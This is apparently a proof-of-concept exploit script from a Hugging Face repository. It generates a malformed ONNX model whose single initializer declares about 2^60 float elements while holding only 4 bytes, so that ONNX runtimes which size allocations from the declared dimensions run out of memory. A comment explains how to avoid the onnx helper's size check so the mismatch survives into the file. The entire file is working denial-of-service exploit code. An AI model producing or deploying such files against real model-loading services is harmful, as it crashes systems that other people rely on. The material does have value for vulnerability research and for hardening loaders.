# onnx-runtime-oom-poc / poc_exploit.py
# Author: Rodion111
# Uploaded with huggingface_hub (revision a551f75, verified)
import onnx
from onnx import helper, TensorProto
import struct
def create_oom_onnx(output_path):
    """Write a deliberately malformed ONNX model to ``output_path``.

    The model holds a single initializer whose *declared* dimensions
    (2**30 x 2**30 = 2**60 elements, ~4 EiB as float32) vastly exceed its
    actual payload (one 4-byte float). A consumer that sizes an allocation
    from the declared dims before validating the payload can be driven
    out of memory.

    Args:
        output_path: filesystem path the serialized model is written to.

    Returns:
        None; the side effect is the file written at ``output_path``.
    """
    print("[*] Creating ONNX model with huge initializer dimensions...")

    # Actual payload: a single little-endian float32 (4 bytes).
    raw_data = struct.pack("<f", 1.0)

    # Declared dims: 2^30 * 2^30 = 2^60 elements.
    huge_dims = [1024 * 1024 * 1024, 1024 * 1024 * 1024]

    # FIX: pass the payload as raw bytes (raw=True). The original call used
    # vals=[1.0] with raw=False, and onnx.helper.make_tensor validates that
    # len(vals) matches the product of dims in that mode, raising ValueError
    # before any file is produced. raw=True stores the bytes verbatim, so the
    # dims/payload mismatch survives into the serialized model.
    initializer = helper.make_tensor(
        name="huge_tensor",
        data_type=TensorProto.FLOAT,
        dims=huge_dims,
        vals=raw_data,
        raw=True,
    )

    node_def = helper.make_node("Identity", ["huge_tensor"], ["output"])
    graph_def = helper.make_graph(
        [node_def],
        "oom-graph",
        [],  # no graph inputs: the Identity node reads the initializer
        [helper.make_tensor_value_info("output", TensorProto.FLOAT, [1])],
        initializer=[initializer],
    )
    # onnx.save serializes without running the checker, so the malformed
    # initializer is written out as-is.
    model_def = helper.make_model(
        graph_def,
        producer_name="onnx-oom-exploit",
        opset_imports=[onnx.helper.make_opsetid("ai.onnx", 19)],
    )
    onnx.save(model_def, output_path)
    print(f"[+] Model saved to {output_path}")
if __name__ == "__main__":
    # Script entry point: write the PoC model to a fixed scratch path.
    create_oom_onnx("/tmp/oom.onnx")